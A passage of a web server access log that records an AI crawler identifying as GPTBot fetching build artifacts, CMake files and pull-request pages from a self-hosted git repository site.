compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:21:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:21:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13849] [Gzip 4.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11005] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:21:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15014] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:21:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20148] [Gzip 9.60] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:21:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 10987] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 14985] [Gzip 5.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:21:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10928] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:22:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=source" [Client 74.7.227.38] [Length 14279] [Gzip 4.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:17:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20165] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:22:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:17:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz?display=rendered" [Client 74.7.227.38] [Length 10964] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/PYZ-00.pyz" -[17/Feb/2026:17:22:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 10988] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=rendered" [Client 74.7.227.38] [Length 11006] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:22:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:17:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=source" [Client 74.7.227.38] [Length 15015] [Gzip 5.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:22:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/PostgresMonitor/build/PostgresWatchdog/EXE-00.toc" -[17/Feb/2026:17:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt?display=rendered" [Client 74.7.227.38] [Length 10968] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/warn-AssetPilot.txt" -[17/Feb/2026:17:22:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt?display=source" [Client 74.7.227.38] [Length 14247] [Gzip 4.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/warn-GoldMonitor.txt" -[17/Feb/2026:17:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=source" [Client 74.7.227.38] [Length 13833] [Gzip 4.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:22:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc?display=rendered" [Client 74.7.227.38] [Length 11007] [Gzip 3.03] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PKG-00.toc" -[17/Feb/2026:17:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc?display=source" [Client 74.7.227.38] [Length 20167] [Gzip 9.59] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/PostgresMonitor/build/PostgresWatchdog/PYZ-00.toc" -[17/Feb/2026:17:22:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/README.md" [Client 74.7.227.38] [Length 9840] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/README.md" -[17/Feb/2026:17:22:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" [Client 74.7.227.38] [Length 9947] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?sort=farduedate&state=all&type=all" -[17/Feb/2026:17:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12191] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11168] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11348] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11173] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11350] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11156] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:22:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9980] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&sort=farduedate&state=all&type=all" -[17/Feb/2026:17:22:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11155] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:22:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11349] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11169] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make" -[17/Feb/2026:17:22:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11159] [Gzip 3.11] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/depend.make" -[17/Feb/2026:17:22:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=source" [Client 74.7.227.38] [Length 12190] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/DependInfo.cmake" -[17/Feb/2026:17:22:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11170] [Gzip 3.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 